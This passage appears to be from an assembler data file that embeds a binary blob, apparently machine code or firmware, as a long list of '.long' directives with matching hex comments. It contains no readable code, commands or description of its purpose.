## 0x91c0c000 .long 2837967432 ## 0xa927f248 .long 2854875720 ## 0xaa29f248 .long 2838295114 ## 0xa92cf24a .long 2830234184 ## 0xa8b1f248 .long 2149708560 ## 0x8021f310 .long 2191778320 ## 0x82a3e210 .long 2720395848 ## 0xa225f248 .long 2695754312 ## 0xa0adf248 .long 1133295488 ## 0x438cb780 .long 712888286 ## 0x2a7dcfde .long 1133294976 ## 0x438cb580 .long 1133295488 ## 0x438cb780 .long 704692257 ## 0x2a00c021 .long 3221320960 ## 0xc0017500 .long 3076559138 ## 0xb7609122 .long 3223405588 ## 0xc0214414 .long 219417858 ## 0xd140d02 .long 163758082 ## 0x9c2c002 .long 2589654964 ## 0x9a5affb4 .long 1150596960 ## 0x4494b760 .long 218284065 ## 0xd02c021 .long 163712260 ## 0x9c20d04 .long 2589130676 ## 0x9a52ffb4 .long 1142732608 ## 0x441cb740 .long 2858021392 ## 0xaa59f210 .long 1149548352 ## 0x4484b740 .long 2831282768 ## 0xa8c1f250 .long 1133819680 ## 0x4394b720 .long 2149708560 ## 0x8021f310 .long 2191778320 ## 0x82a3e210 .long 754896863 ## 0x2cfecfdf .long 1133819168 ## 0x4394b520 .long 1141683584 ## 0x440cb580 .long 1150072096 ## 0x448cb520 .long 1133819680 ## 0x4394b720 .long 3288440396 ## 0xc4019e4c .long 1962945024 ## 0x75002a00 .long 2443362304 ## 0x91a2c000 .long 2856710736 ## 0xaa45f250 .long 2832069200 ## 0xa8cdf250 .long 440451074 ## 0x1a40c002 .long 1141683584 ## 0x440cb580 .long 3038779584 ## 0xb52018c0 .long 2655798412 ## 0x9e4c448c .long 746636288 ## 0x2c80c400 .long 3422516800 ## 0xcbff7640 .long 3045075582 ## 0xb5802a7e .long 3221242764 ## 0xc000438c .long 4292120898 ## 0xffd49142 .long 3078658165 ## 0xb7809875 .long 3422438284 ## 0xcbfe438c .long 3045075581 ## 0xb5802a7d .long 3076473740 ## 0xb75f438c .long 1988132724 ## 0x76807f74 .long 2472722432 ## 0x9362c000 .long 1577891680 ## 0x5e0cb760 .long 759237948 ## 0x2d410d3c .long 2850484296 ## 0xa9e6f048 .long 1561173587 ## 0x5d0d9e53 .long 3223395588 ## 0xc0211d04 .long 4290002176 ## 0xffb43d00 .long 3078658565 ## 0xb7809a05 .long 3076480524 ## 0xb75f5e0c .long 4064837476 ## 0xf2487f64 .long 3076565255 ## 0xb760a907 .long 4027604508 ## 0xf0105e1c .long 4032331813 ## 0xf0588025 .long 3078660709 ## 0xb780a265 .long 3238019980 ## 0xc100438c .long 1962945024 ## 0x75002a00 .long 2437070848 ## 0x9142c000 .long 2597912500 ## 0x9ad8ffb4 .long 1133295488 ## 0x438cb780 .long 712888062 ## 0x2a7dcefe .long 1133294976 ## 0x438cb580 .long 1124906880 ## 0x430cb780 .long 704692228 ## 0x2a00c004 .long 3221386496 ## 0xc0027500 .long 3511849634 ## 0xd15292a2 .long 3072330456 ## 0xb7200ad8 .long 3658498442 ## 0xda10418a .long 3121195553 ## 0xba09aa21 .long 3122937858 ## 0xba244002 .long 168574978 ## 0xa0c4002 .long 3221385288 ## 0xc0027048 .long 3074396408 ## 0xb73f90f8 .long 3076554476 ## 0xb7607eec .long 3221507732 ## 0xc0044e94 .long 220072322 ## 0xd1e0982 .long 169005073 ## 0xa12d011 .long 712818702 ## 0x2a7cc00e .long 2129442207 ## 0x7eecb59f .long 2579955636 ## 0x99c6ffb4 .long 1326757728 ## 0x4f14b760 .long 159563778 ## 0x982c002 .long 4289989902 ## 0xffb40d0e .long 3074464191 ## 0xb74099bf .long 4060630684 ## 0xf2084e9c .long 3074468409 ## 0xb740aa39 .long 4061155076 ## 0xf2104f04 .long 3076499617 ## 0xb75fa8a1 .long 4064837356 ## 0xf2487eec .long 3271665826 ## 0xc301a8a2 .long 3040903456 ## 0xb5408120 .long 1887587996 ## 0x70824e9c .long 2200092673 ## 0x8322c001 .long 1325708608 ## 0x4f04b540 .long 2458304512 ## 0x9286c000 .long 1645846091 ## 0x62199e4b .long 4077936791 ## 0xf3106097 .long 3792734241 ## 0xe2108821 .long 151161507 ## 0x9028aa3 .long 2129442143 ## 0x7eecb55f .long 167821328 ## 0xa00c010 .long 1317844352 ## 0x4e8cb580 .long 142655496 ## 0x880c008 .long 1326232864 ## 0x4f0cb520 .long 1133295488 ## 0x438cb780 .long 973127745 ## 0x3a00c041 .long 1133294976 ## 0x438cb580 .long 1133295488 ## 0x438cb780 .long 704692229 ## 0x2a00c005 .long 3221517568 ## 0xc0047500 .long 4061172034 ## 0xf2109142 .long 4061178306 ## 0xf210a9c2 .long 163752261 ## 0x9c2a945 .long 209849666 ## 0xc820d42 .long 4289988738 ## 0xffb40882 .long 4061174170 ## 0xf210999a .long 3223366265 ## 0xc020aa79 .long 1962945024 ## 0x75002a00 .long 2466430976 ## 0x9302c000 .long 2846552584 ## 0xa9aaf208 .long 2838622728 ## 0xa931f208 .long 220334498 ## 0xd2209a2 .long 142740610 ## 0x8820c82 .long 2577924020 ## 0x99a7ffb4 .long 2846814728 ## 0xa9aef208 .long 2838622728 ## 0xa931f208 .long 220334498 ## 0xd2209a2 .long 142740610 ## 0x8820c82 .long 2579234740 ## 0x99bbffb4 .long 2441134080 ## 0x9180c000 .long 2846552584 ## 0xa9aaf208 .long 2838622728 ## 0xa931f208 .long 220334530 ## 0xd2209c2 .long 142740610 ## 0x8820c82 .long 2574516148 ## 0x9973ffb4 .long 1133295392 ## 0x438cb720 .long 3238068739 ## 0xc1010203 .long 1962945024 ## 0x75002a00 .long 2434973697 ## 0x9122c001 .long 2833963592 ## 0xa8eada48 .long 2841899528 ## 0xa963f208 .long 687787775 ## 0x28feceff .long 1133294880 ## 0x438cb520 .long 2834160200 ## 0xa8edda48 .long 2842227210 ## 0xa968f20a .long 3793771664 ## 0xe2205c90 .long 4060643499 ## 0xf20880ab .long 33794407 ## 0x203a967 .long 3254802572 ## 0xc200588c .long 4077935116 ## 0xf3105a0c .long 3792732705 ## 0xe2108221 .long 4060643491 ## 0xf20880a3 .long 4060651746 ## 0xf208a0e2 .long 4060652137 ## 0xf208a269 .long 4061176037 ## 0xf210a0e5 .long 4061176002 ## 0xf210a0c2 .long 4061176009 ## 0xf210a0c9 .long 3221332557 ## 0xc001a24d .long 4061171776 ## 0xf2109040 .long 4061178489 ## 0xf210aa79 .long 3223365825 ## 0xc020a8c1 .long 1962945024 ## 0x75002a00 .long 4061137088 ## 0xf21008c0 .long 3221266625 ## 0xc000a0c1 .long 4060647810 ## 0xf2089182 .long 4060654121 ## 0xf208aa29 .long 169912493 ## 0xa20a8ad .long 2720657928 ## 0xa229f208 .long 3221227680 ## 0xc00008a0 .long 4060647744 ## 0xf2089140 .long 4060654121 ## 0xf208aa29 .long 172009645 ## 0xa40a8ad .long 2720657928 ## 0xa229f208 .long 4060612800 ## 0xf20808c0 .long 3078660269 ## 0xb780a0ad .long 3489350540 ## 0xcffb438c .long 3221826174 ## 0xc0092a7e .long 3045079552 ## 0xb5803a00 .long 3078636428 ## 0xb780438c .long 1962954124 ## 0x75004d8c .long 2437070848 ## 0x9142c000 .long 209895488 ## 0xc82c040 .long 3221271681 ## 0xc000b481 .long 167952897 ## 0xa02c201 .long 3221271681 ## 0xc000b481 .long 1133295488 ## 0x438cb780 .long 704692232 ## 0x2a00c008 .long 3221255424 ## 0xc0007500 .long 3239154530 ## 0xc1119362 .long 3226339586 ## 0xc04e0902 .long 233965888 ## 0xdf20940 .long 218237314 ## 0xd020982 .long 2610298804 ## 0x9b95ffb4 .long 151175441 ## 0x902c111 .long 155238438 ## 0x940c026 .long 159518198 ## 0x9820df6 .long 222478340 ## 0xd42c004 .long 2609643444 ## 0x9b8bffb4 .long 1133295488 ## 0x438cb780 .long 712888310 ## 0x2a7dcff6 .long 1133294976 ## 0x438cb580 .long 1133295488 ## 0x438cb780 .long 704692352 ## 0x2a00c080 .long 3221255424 ## 0xc0007500 .long 3076559298 ## 0xb76091c2 .long 3122348434 ## 0xba1b4192 .long 3222552579 ## 0xc0144003 .long 3078658687 ## 0xb7809a7f .long 3481158540 ## 0xcf7e438c .long 3045075581 ## 0xb5802a7d .long 3078636428 ## 0xb780438c .long 3222291340 ## 0xc010438c .long 1962945024 ## 0x75002a00 .long 2481111041 ## 0x93e2c001 .long 151175457 ## 0x902c121 .long 155238414 ## 0x940c00e .long 159518110 ## 0x9820d9e .long 4289989890 ## 0xffb40d02 .long 3240205124 ## 0xc1219b44 .long 3230009602 ## 0xc0860902 .long 228723008 ## 0xda20940 .long 218237314 ## 0xd020982 .long 2604400564 ## 0x9b3bffb4 .long 2121578335 ## 0x7e74b75f .long 3221321344 ## 0xc0017680 .long 4061171714 ## 0xf2109002 .long 708881017 ## 0x2a40aa79 .long 3221255424 ## 0xc0007500 .long 3240203074 ## 0xc1219342 .long 3221358850 ## 0xc0020902 .long 228985088 ## 0xda60900 .long 218499458 ## 0xd060982 .long 2603089844 ## 0x9b27ffb4 .long 151175457 ## 0x902c121 .long 151044224 ## 0x900c080 .long 159518118 ## 0x9820da6 .long 4289989910 ## 0xffb40d16 .long 3078658846 ## 0xb7809b1e .long 3223405452 ## 0xc021438c .long 3045079552 ## 0xb5803a00 .long 3078636428 ## 0xb780438c .long 3488498572 ## 0xcfee438c .long 3223333501 ## 0xc0202a7d .long 3045079552 ## 0xb5803a00 .long 3078636428 ## 0xb780438c .long 3355460492 ## 0xc800438c .long 1962945024 ## 0x75002a00 .long 2462236672 ## 0x92c2c000 .long 2104276895 ## 0x7d6cb79f .long 1100134240 ## 0x4192b760 .long 2843406864 ## 0xa97af210 .long 3122332041 ## 0xba1b0189 .long 1561411587 ## 0x5d114003 .long 755256580 ## 0x2d044d04 .long 2614493108 ## 0x9bd5ffb4 .long 1133295488 ## 0x438cb780 .long 712951806 ## 0x2a7ec7fe .long 1133294976 ## 0x438cb580 .long 1133295488 ## 0x438cb780 .long 704692736 ## 0x2a00c200 .long 3221255424 ## 0xc0007500 .long 226922690 ## 0xd8690c2 .long 4289988994 ## 0xffb40982 .long 3078658614 ## 0xb7809a36 .long 3225502604 ## 0xc041438c .long 1962945024 ## 0x75002a00 .long 2470625280 ## 0x9342c000 .long 151175425 ## 0x902c101 .long 155238402 ## 0x940c002 .long 159518118 ## 0x9820da6 .long 4289989890 ## 0xffb40d02 .long 3238107866 ## 0xc1019ada .long 3229616386 ## 0xc0800902 .long 228985152 ## 0xda60940 .long 219285890 ## 0xd120982 .long 2597453748 ## 0x9ad1ffb4 .long 1133295488 ## 0x438cb780 .long 712953791 ## 0x2a7ecfbf .long 1133294976 ## 0x438cb580 .long 1133295392 ## 0x438cb720 .long 3221815811 ## 0xc0090203 .long 1962945024 ## 0x75002a00 .long 2437070849 ## 0x9142c001 .long 151175425 ## 0x902c101 .long 155238414 ## 0x940c00e .long 687788023 ## 0x28fecff7 .long 1133294880 ## 0x438cb520 .long 159518110 ## 0x9820d9e .long 4289989890 ## 0xffb40d02 .long 4061174454 ## 0xf2109ab6 .long 3223366265 ## 0xc020aa79 .long 1962945024 ## 0x75002a00 .long 2443362304 ## 0x91a2c000 .long 151175425 ## 0x902c101 .long 155238406 ## 0x940c006 .long 159518114 ## 0x9820da2 .long 4289989890 ## 0xffb40d02 .long 3221265062 ## 0xc0009aa6 .long 3238105440 ## 0xc1019160 .long 3230009602 ## 0xc0860902 .long 228723008 ## 0xda20940 .long 218237314 ## 0xd020982 .long 2593914804 ## 0x9a9bffb4 .long 151175617 ## 0x902c1c1 .long 155238406 ## 0x940c006 .long 159518158 ## 0x9820dce .long 4289989890 ## 0xffb40d02 .long 3222575114 ## 0xc014980a .long 3224410562 ## 0xc03099c2 .long 3032550538 ## 0xb4c10c8a .long 3078668288 ## 0xb780c000 .long 210259340 ## 0xc884d8c .long 3221271681 ## 0xc000b481 .long 142789633 ## 0x882cc01 .long 3022068872 ## 0xb4211c88 .long 3224682496 ## 0xc034c000 .long 3072367577 ## 0xb7209bd9 .long 3492892044 ## 0xd0314d8c .long 1962945040 ## 0x75002a10 .long 3042904322 ## 0xb55f0902 .long 3221258092 ## 0xc0007f6c .long 3292172738 ## 0xc43a91c2 .long 3032550530 ## 0xb4c10c82 .long 2969878528 ## 0xb104c000 .long 3222356512 ## 0xc0114220 .long 3225041408 ## 0xc03a3a00 .long 3028356226 ## 0xb4810c82 .long 3524378624 ## 0xd211c000 .long 1962945040 ## 0x75002a10 .long 2470625280 ## 0x9342c000 .long 210420816 ## 0xc8ac450 .long 3221271745 ## 0xc000b4c1 .long 1111535874 ## 0x4240b102 .long 3222183507 ## 0xc00e9e53 .long 3045009916 ## 0xb57f29fc .long 8879980 ## 0x877f6c .long 3032554628 ## 0xb4c11c84 .long 2969878528 ## 0xb104c000 .long 705708576 ## 0x2a104220 .long 3221255424 ## 0xc0007500 .long 1485869220 ## 0x589090a4 .long 2137830719 ## 0x7f6cb53f .long 1124906880 ## 0x430cb780 .long 210419760 ## 0xc8ac030 .long 1301067136 ## 0x4d8cb580 .long 3221271745 ## 0xc000b4c1 .long 167954433 ## 0xa02c801 .long 167821314 ## 0xa00c002 .long 3221271681 ## 0xc000b481 .long 3221489854 ## 0xc00408be .long 3022064788 ## 0xb4210c94 .long 3233857536 ## 0xc0c0c000 .long 4289990018 ## 0xffb40d82 .long 3076561440 ## 0xb7609a20 .long 3078635794 ## 0xb7804112 .long 2661565068 ## 0x9ea4428c .long 3072367714 ## 0xb7209c62 .long 3224651404 ## 0xc034468c .long 1485900974 ## 0x58910cae .long 3221271585 ## 0xc000b421 .long 1962936834 ## 0x75000a02 .long 2453979136 ## 0x9244c000 .long 2137831231 ## 0x7f6cb73f .long 3221255232 ## 0xc0007440 .long 3492909474 ## 0xd03191a2 .long 692128030 ## 0x2941091e .long 159518186 ## 0x9820dea .long 423628034 ## 0x19400d02 .long 956350753 ## 0x3900c121 .long 2585132980 ## 0x9a15ffb4 .long 2569584660 ## 0x9928c014 .long 1745401733 ## 0x6808b785 .long 3078649088 ## 0xb7807500 .long 3221243788 ## 0xc000478c .long 712609954 ## 0x2a7990a2 .long 1745401285 ## 0x6808b5c5 .long 209895486 ## 0xc82c03e .long 3221271681 ## 0xc000b481 .long 1351399296 ## 0x508cb780 .long 3072362242 ## 0xb7208702 .long 243417482 ## 0xe82418a .long 2112140639 ## 0x7de4b55f .long 1962945032 ## 0x75002a08 .long 3038775428 ## 0xb5200884 .long 3221242250 ## 0xc000418a .long 3072365410 ## 0xb7209362 .long 3072351244 ## 0xb7205c0c .long 3507569298 ## 0xd1114292 .long 3657959960 ## 0xda080a18 .long 210020481 ## 0xc84a881 .long 3122961996 ## 0xba249e4c .long 1485914114 ## 0x58914002 .long 3038802178 ## 0xb5207102 .long 3221242514 ## 0xc0004292 .long 3078656312 ## 0xb7809138 .long 3047178762 ## 0xb5a0420a .long 168051346 ## 0xa044292 .long 1107998080 ## 0x420ab580 .long 2104801087 ## 0x7d74b73f .long 4292965952 ## 0xffe17640 .long 3078656258 ## 0xb7809102 .long 3556721548 ## 0xd3ff438c .long 4292967742 ## 0xffe17d3e .long 3076493380 ## 0xb75f9044 .long 1954578284 ## 0x74807f6c .long 2477064160 ## 0x93a4ffe0 .long 2096019359 ## 0x7ceeb79f .long 2104407999 ## 0x7d6eb7bf .long 2112796639 ## 0x7deeb7df .long 2121185279 ## 0x7e6eb7ff .long 2355150850 ## 0x8c60c002 .long 2785385506 ## 0xa6059c22 .long 2216738820 ## 0x8420c004 .long 211994665 ## 0xca2c829 .long 211862734 ## 0xca0c4ce .long 2889728048 ## 0xac3dc030 .long 2365645107 ## 0x8d00e133 .long 2757607480 ## 0xa45dc038 .long 2889728048 ## 0xac3dc030 .long 2757607480 ## 0xa45dc038 .long 2889728016 ## 0xac3dc010 .long 2757607448 ## 0xa45dc018 .long 2888155152 ## 0xac25c010 .long 2756034584 ## 0xa445c018 .long 1157936960 ## 0x4504b740 .long 2856448000 ## 0xaa41f000 .long 1544337312 ## 0x5c0cb7a0 .long 3254820397 ## 0xc2009e2d .long 3499317768 ## 0xd0935a08 .long 2661878080 ## 0x9ea90940 .long 2842550304 ## 0xa96de020 .long 3221753282 ## 0xc0080dc2 .long 163712322 ## 0x9c20d42 .long 2608332692 ## 0x9b77ff94 .long 1577891712 ## 0x5e0cb780 .long 2829185544 ## 0xa8a1f208 .long 4060644610 ## 0xf2088502 .long 4060653734 ## 0xf208a8a6 .long 4060651779 ## 0xf208a103 .long 4060651653 ## 0xf208a085 .long 4060653865 ## 0xf208a929 .long 4060651658 ## 0xf208a08a .long 4060653870 ## 0xf208a92e .long 4060653746 ## 0xf208a8b2 .long 4064846093 ## 0xf248a10d .long 4060653745 ## 0xf208a8b1 .long 4060651794 ## 0xf208a112 .long 4060651670 ## 0xf208a096 .long 151691418 ## 0x90aa09a .long 210944054 ## 0xc92c036 .long 4064807104 ## 0xf24808c0 .long 3024199813 ## 0xb441a085 .long 169263104 ## 0xa16c000 .long 3028360332 ## 0xb4811c8c .long 4029792256 ## 0xf031c000 .long 3778120704 ## 0xe1318c00 .long 2661518720 ## 0x9ea38d80 .long 2147267935 ## 0x7ffcb55f .long 3110079746 ## 0xb9600d02 .long 4060627064 ## 0xf2084078 .long 2646253827 ## 0x9dbaa103 .long 1561186594 ## 0x5d0dd122 .long 4029259309 ## 0xf0299e2d .long 3490883813 ## 0xd012a8e5 .long 1552428206 ## 0x5c882cae .long 1493750054 ## 0x5908d126 .long 3761806922 ## 0xe0389e4a .long 218409549 ## 0xd04aa4d .long 1353197756 ## 0x50a828bc .long 2722181698 ## 0xa2413242 .long 2445410303 ## 0x91c1ffff .long 2858545168 ## 0xaa61f010 .long 210681910 ## 0xc8ec036 .long 3221271681 ## 0xc000b481 .long 2146219839 ## 0x7fecb73f .long 3022068868 ## 0xb4211c84 .long 3224682496 ## 0xc034c000 .long 3355548411 ## 0xc8019afb .long 3239184578 ## 0xc11208c2 .long 3356035216 ## 0xc8090890 .long 3320973890 ## 0xc5f20a42 .long 3224504848 ## 0xc0320a10 .long 3045067966 ## 0xb5800cbe .long 3022078604 ## 0xb421428c .long 171884544 ## 0xa3ec000 .long 3028356320 ## 0xb4810ce0 .long 142786560 ## 0x882c000 .long 214352000 ## 0xcc6c080 .long 3221271585 ## 0xc000b421 .long 172148737 ## 0xa42c801 .long 169394450 ## 0xa18c112 .long 214089778 ## 0xcc2c032 .long 3221271681 ## 0xc000b481 .long 215746752 ## 0xcdc08c0 .long 3221271585 ## 0xc000b421 .long 3229616642 ## 0xc0800a02 .long 3028356294 ## 0xb4810cc6 .long 3355557888 ## 0xc801c000 .long 3239315650 ## 0xc11408c2 .long 3224504464 ## 0xc0320890 .long 3022064838 ## 0xb4210cc6 .long 172277760 ## 0xa44c000 .long 3028356312 ## 0xb4810cd8 .long 142786560 ## 0x882c000 .long 214352000 ## 0xcc6c080 .long 3221271585 ## 0xc000b421 .long 172148737 ## 0xa42c801 .long 169394452 ## 0xa18c114 .long 214614066 ## 0xccac032 .long 3221271681 ## 0xc000b481 .long 215222472 ## 0xcd408c8 .long 3221271585 ## 0xc000b421 .long 3229616642 ## 0xc0800a02 .long 3028356294 ## 0xb4810cc6 .long 3080699904 ## 0xb79fc000 .long 3082779374 ## 0xb7bf7aee .long 3221519214 ## 0xc0047b6e .long 2619509856 ## 0x9c228c60 .long 3221293186 ## 0xc0010882 .long 3274837138 ## 0xc3320c92 .long 3022064772 ## 0xb4210c84 .long 3078668288 ## 0xb780c000 .long 2269006988 ## 0x873e4c8c .long 3225422352 ## 0xc0400a10 .long 3078659211 ## 0xb7809c8b .long 2619523640 ## 0x9c22c238 .long 1183627136 ## 0x468cb780 .long 3222014528 ## 0xc00c0a40 .long 3045094688 ## 0xb5807520 .long 3007334028 ## 0xb340468c .long 2231519412 ## 0x850248b4 .long 1184675136 ## 0x469cb540 .long 3078659106 ## 0xb7809c22 .long 4060630156 ## 0xf2084c8c .long 4060653717 ## 0xf208a895 .long 4060653710 ## 0xf208a88e .long 4060653829 ## 0xf208a905 .long 4069042589 ## 0xf288a99d .long 4060653830 ## 0xf208a906 .long 4060651677 ## 0xf208a09d .long 4060651670 ## 0xf208a096 .long 4060651789 ## 0xf208a10d .long 4060651909 ## 0xf208a185 .long 4060653721 ## 0xf208a899 .long 4060653714 ## 0xf208a892 .long 4064848137 ## 0xf248a909 .long 4064848257 ## 0xf248a981 .long 4060651649 ## 0xf208a081 .long 4060651674 ## 0xf208a09a .long 4060651793 ## 0xf208a111 .long 4069040521 ## 0xf288a189 .long 4064848001 ## 0xf248a881 .long 4064848277 ## 0xf248a995 .long 4064848030 ## 0xf248a89e .long 4069042445 ## 0xf288a90d .long 4064845957 ## 0xf248a085 .long 4064846221 ## 0xf248a18d .long 4069042585 ## 0xf288a999 .long 4064845954 ## 0xf248a082 .long 4064846101 ## 0xf248a115 .long 4064848017 ## 0xf248a891 .long 4069040529 ## 0xf288a191 .long 4069042569 ## 0xf288a989 .long 4064848026 ## 0xf248a89a .long 4069040281 ## 0xf288a099 .long 4064846090 ## 0xf248a10a .long 4069040541 ## 0xf288a19d .long 4069042589 ## 0xf288a99d .long 4069040286 ## 0xf288a09e .long 4069042325 ## 0xf288a895 .long 4069042322 ## 0xf288a892 .long 4069042445 ## 0xf288a90d .long 4069040281 ## 0xf288a099 .long 4069040278 ## 0xf288a096 .long 4069040401 ## 0xf288a111 .long 2619515277 ## 0x9c22a18d .long 3355551245 ## 0xc801a60d .long 3406826050 ## 0xcb100a42 .long 3224504832 ## 0xc0320a00 .long 3028356330 ## 0xb4810cea .long 3355557888 ## 0xc801c000 .long 3222276290 ## 0xc01008c2 .long 209979528 ## 0xc840888 .long 3221271585 ## 0xc000b421 .long 172146696 ## 0xa42c008 .long 484753410 ## 0x1ce4c002 .long 3221271681 ## 0xc000b481 .long 146980872 ## 0x8c2c008 .long 219070512 ## 0xd0ec030 .long 3221271586 ## 0xc000b422 .long 209896528 ## 0xc82c450 .long 440451080 ## 0x1a40c008 .long 3221271681 ## 0xc000b481 .long 1109438721 ## 0x4220b101 .long 952156162 ## 0x38c0c002 .long 1309455648 ## 0x4e0cb520 .long 209895504 ## 0xc82c050 .long 3221271585 ## 0xc000b421 .long 226672832 ## 0xd82c0c0 .long 3221752210 ## 0xc0080992 .long 3221753090 ## 0xc0080d02 .long 4292086018 ## 0xffd40902 .long 3293616312 ## 0xc45098b8 .long 167906438 ## 0xa020c86 .long 3221271681 ## 0xc000b481 .long 1109438724 ## 0x4220b104 .long 167952392 ## 0xa02c008 .long 219070512 ## 0xd0ec030 .long 3221271682 ## 0xc000b482 .long 3221752964 ## 0xc0080c84 .long 3028359680 ## 0xb4811a00 .long 2969944064 ## 0xb105c000 .long 3263185440 ## 0xc2804220 .long 3355531829 ## 0xc8015a35 .long 146802818 ## 0x8c00882 .long 721207310 ## 0x2afcc00e .long 1519436416 ## 0x5a90c280 .long 726585458 ## 0x2b4ed072 .long 3224411821 ## 0xc0309ead .long 3022064778 ## 0xb4210c8a .long 172146688 ## 0xa42c000 .long 3028356228 ## 0xb4810c84 .long 2000732160 ## 0x7740c000 .long 1577891776 ## 0x5e0cb7c0 .long 2416099329 ## 0x9002c001 .long 249483313 ## 0xeded031 .long 159518186 ## 0x9820dea .long 717294850 ## 0x2ac10d02 .long 424726609 ## 0x1950d051 .long 956350753 ## 0x3900c121 .long 2550923188 ## 0x980bffb4 .long 2848387656 ## 0xa9c6f248 .long 3263168907 ## 0xc280018b .long 444881549 ## 0x1a845a8d .long 3223428778 ## 0xc0219eaa .long 4287905024 ## 0xff943d00 .long 4064844141 ## 0xf248996d .long 3490753093 ## 0xd010aa45 .long 38409948 ## 0x24a16dc .long 2722493000 ## 0xa245f248 .long 210158672 ## 0xc86c450 .long 3028355586 ## 0xb4810a02 .long 2969878528 ## 0xb104c000 .long 174998048 ## 0xa6e4220 .long 211730484 ## 0xc9ec034 .long 3221271681 ## 0xc000b481 .long 1544337184 ## 0x5c0cb720 .long 2856710728 ## 0xaa45f248 .long 1177925408 ## 0x4635b720 .long 423678035 ## 0x1940d053 .long 2292970000 ## 0x88abf210 .long 211992704 ## 0xca2c080 .long 1510785664 ## 0x5a0cc280 .long 1108129152 ## 0x420cb580 .long 3221271713 ## 0xc000b4a1 .long 1510520709 ## 0x5a08b785 .long 3221452032 ## 0xc0037500 .long 3072430690 ## 0xb7219262 .long 3078707468 ## 0xb781590c .long 3224393612 ## 0xc030578c .long 168066112 ## 0xa047c40 .long 1468839297 ## 0x578cb581 .long 2424487936 ## 0x9082c000 .long 2562965556 ## 0x98c3c034 .long 1401730848 ## 0x538cb720 .long 1102427936 ## 0x41b5b720 .long 1468839809 ## 0x578cb781 .long 1143846720 ## 0x442db740 .long 1648598601 ## 0x62439e49 .long 3221254404 ## 0xc0007104 .long 2231799992 ## 0x850690b8 .long 1612232005 ## 0x6018b545 .long 1527297925 ## 0x5b08b785 .long 3080746240 ## 0xb7a07500 .long 3221249684 ## 0xc0005e94 .long 3080753762 ## 0xb7a09262 .long 4061156620 ## 0xf210550c .long 4060653629 ## 0xf208a83d .long 226929057 ## 0xd86a9a1 .long 2623708804 ## 0x9c629e84 .long 2686579208 ## 0xa021f208 .long 2821059152 ## 0xa825f250 .long 159817387 ## 0x9869eab .long 2623708804 ## 0x9c629e84 .long 1527297925 ## 0x5b08b785 .long 3221255424 ## 0xc0007500 .long 3076559204 ## 0xb7609164 .long 4061156628 ## 0xf2105514 .long 2659493925 ## 0x9e84a825 .long 42048610 ## 0x2819c62 .long 2451619840 ## 0x9220c000 .long 1518909317 ## 0x5a88b785 .long 3221255424 ## 0xc0007500 .long 3078656258 ## 0xb7809102 .long 4060632588 ## 0xf208560c .long 3221269121 ## 0xc000aa81 .long 3078656192 ## 0xb78090c0 .long 4060632716 ## 0xf208568c .long 3072371341 ## 0xb720aa8d .long 3078641932 ## 0xb780590c .long 1962950953 ## 0x75004129 .long 3221226243 ## 0xc0000303 .long 3078984292 ## 0xb7859264 .long 1962957576 ## 0x75005b08 .long 2428813312 ## 0x90c4c000 .long 2854351440 ## 0xaa21f250 .long 2623708836 ## 0x9c629ea4 .long 1109178176 ## 0x421cb740 .long 2855662096 ## 0xaa35f210 .long 2309219104 ## 0x89a3e320 .long 2623708836 ## 0x9c629ea4 .long 2855924240 ## 0xaa39f210 .long 26058411 ## 0x18d9eab .long 2623708836 ## 0x9c629ea4 .long 1418508160 ## 0x548cb780 .long 212254848 ## 0xca6c080 .long 2861683400 ## 0xaa91d2c8 .long 3221271713 ## 0xc000b4a1 .long 227721218 ## 0xd92c002 .long 2615476148 ## 0x9be4ffb4 .long 4294930442 ## 0xffff700a .long 226923364 ## 0xd869364 .long 218761666 ## 0xd0a09c2 .long 151175457 ## 0x902c121 .long 2563243924 ## 0x98c7ff94 .long 1544337280 ## 0x5c0cb780 .long 2844979784 ## 0xa992f248 .long 218284193 ## 0xd02c0a1 .long 163712260 ## 0x9c20d04 .long 2561867668 ## 0x98b2ff94 .long 226672832 ## 0xd82c0c0 .long 222431634 ## 0xd420992 .long 4289988930 ## 0xffb40942 .long 172137394 ## 0xa429bb2 .long 210681904 ## 0xc8ec030 .long 3221271681 ## 0xc000b481 .long 2129573791 ## 0x7eeeb79f .long 2137962431 ## 0x7f6eb7bf .long 2146351071 ## 0x7feeb7df .long 2619509856 ## 0x9c228c60 .long 1544337152 ## 0x5c0cb700 .long 201488064 ## 0xc0276c0 .long 3221228930 ## 0xc0000d82 .long 3078656834 ## 0xb7809342 .long 3509666700 ## 0xd131438c .long 3072329856 ## 0xb7200880 .long 3036692531 ## 0xb5004033 .long 3036696468 ## 0xb5004f94 .long 3036696596 ## 0xb5005014 .long 747129236 ## 0x2c884994 .long 3456071232 ## 0xcdff7640 .long 3045075582 ## 0xb5802a7e .long 2233615244 ## 0x8522438c .long 2422390784 ## 0x9062c000 .long 3040904466 ## 0xb5408512 .long 1958759324 ## 0x74c04b9c .long 1519695680 ## 0x5a94b740 .long 2464333824 ## 0x92e2c000 .long 1133295488 ## 0x438cb780 .long 3624961282 ## 0xd8108502 .long 3040913601 ## 0xb540a8c1 .long 3040890908 ## 0xb540501c .long 3040953116 ## 0xb541431c .long 3040893596 ## 0xb5405a9c .long 3040889884 ## 0xb5404c1c .long 3038792092 ## 0xb520499c .long 3456061324 ## 0xcdff4f8c .long 3045075582 ## 0xb5802a7e .long 3509666700 ## 0xd131438c .long 3072329856 ## 0xb7200880 .long 3078635571 ## 0xb7804033 .long 3490857740 ## 0xd012430c .long 8989716 ## 0x892c14 .long 704692232 ## 0x2a00c008 .long 3489297664 ## 0xcffa7500 .long 3038783741 ## 0xb52028fd .long 3221242636 ## 0xc000430c .long 3078656706 ## 0xb78092c2 .long 1979728780 ## 0x7600438c .long 973129728 ## 0x3a00c800 .long 1133294976 ## 0x438cb580 .long 2430910464 ## 0x90e4c000 .long 3041232134 ## 0xb5458506 .long 3221253144 ## 0xc0006c18 .long 3078983936 ## 0xb7859100 .long 226913288 ## 0xd866c08 .long 3045407240 ## 0xb5853a08 .long 3074780168 ## 0xb7456c08 .long 3490802696 ## 0xd0116c08 .long 1962945058 ## 0x75002a22 .long 2432876544 ## 0x9102c000 .long 1133295488 ## 0x438cb780 .long 973127696 ## 0x3a00c010 .long 1133294976 ## 0x438cb580 .long 1275901824 ## 0x4c0cb780 .long 3221255424 ## 0xc0007500 .long 3078656226 ## 0xb78090e2 .long 712590092 ## 0x2a79430c .long 1124906368 ## 0x430cb580 .long 1125431072 ## 0x4314b720 .long 1267513120 ## 0x4b8cb720 .long 2030214732 ## 0x79029e4c .long 707711985 ## 0x2a2ed3f1 .long 1510326784 ## 0x5a05c200 .long 1812510085 ## 0x6c08b585 .long 2432876544 